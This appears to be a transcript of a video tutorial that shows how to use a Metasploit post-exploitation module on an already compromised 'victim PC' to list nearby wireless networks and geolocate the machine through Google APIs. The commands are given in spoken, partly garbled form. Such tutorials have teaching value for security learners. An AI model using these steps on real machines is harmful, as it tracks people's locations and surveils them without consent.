Welcome. In this video, we are going to learn gather WLAN information and geolocation of remote Windows, Linux or Mac. Enumerate wireless networks visible to target device. Optionally, geolocate the target by gathering local wireless networks and performing a lookup against Google APIs. Let's open up terminal. Here I already created sessions. In previous video, I have shown that how to get Metasploit sessions. Type sessions. You can see that active sessions. Let's load WLAN_geolocate into MSF console. Now type use post/multi gather/LAN_geolocate. Type info. Here you can see that model information. Type set payload Windows Metasploit/reverse_TCP. Let's set session as 2. Type set session 2. Now execute it. You can see that wireless list will be stored on your local computer. root/.msf4/loot directory path. You can see the final result output. We get interface name and all from victim PC. So that's it in this video on WLAN information and geolocation of remote Windows in Metasploit. Thank you for watching this video.